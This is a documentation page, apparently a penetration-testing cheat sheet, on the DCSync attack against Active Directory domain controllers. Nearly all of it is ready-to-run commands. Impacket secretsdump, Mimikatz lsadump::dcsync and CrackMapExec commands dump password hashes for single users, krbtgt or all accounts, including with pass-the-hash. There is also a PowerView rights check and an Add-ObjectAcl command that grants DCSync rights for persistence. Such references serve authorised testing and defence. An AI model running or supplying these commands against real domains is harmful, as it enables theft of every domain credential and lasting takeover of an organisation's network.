Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Abuse DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges to replicate password data from DC. No need to run code on DC.

Requirements

  • Domain Admins, Enterprise Admins, or
  • Account with replication rights (DCSync rights)

Impacket — secretsdump

Single User

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user administrator
impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user krbtgt

All Users

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc

With Hash (PtH)

impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM_HASH -just-dc

NTDS Only (No SAM/LSA)

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-ntlm

Mimikatz

mimikatz # lsadump::dcsync /domain:domain.local /user:administrator
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:domain.local /all /csv

CrackMapExec

crackmapexec smb DC_IP -u admin -p password --ntds
crackmapexec smb DC_IP -u admin -H HASH --ntds
crackmapexec smb DC_IP -u admin -p password --ntds --users    # Users only

Check DCSync Rights

PowerView

Get-ObjectAcl -DistinguishedName "DC=domain,DC=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication')}

Manual

Look for these rights on domain object:
  • DS-Replication-Get-Changes (GUID: 1131f6aa-…)
  • DS-Replication-Get-Changes-All (GUID: 1131f6ad-…)

Grant DCSync Rights (Persistence)

Add-ObjectAcl -TargetDistinguishedName "DC=domain,DC=local" -PrincipalSamAccountName targetuser -Rights DCSync

Quick Reference

TaskCommand
Single usersecretsdump DOMAIN/admin:pass@DC -just-dc-user krbtgt
All hashessecretsdump DOMAIN/admin:pass@DC -just-dc
Mimikatzlsadump::dcsync /domain:dom.local /user:admin
CMEcrackmapexec smb DC -u admin -p pass --ntds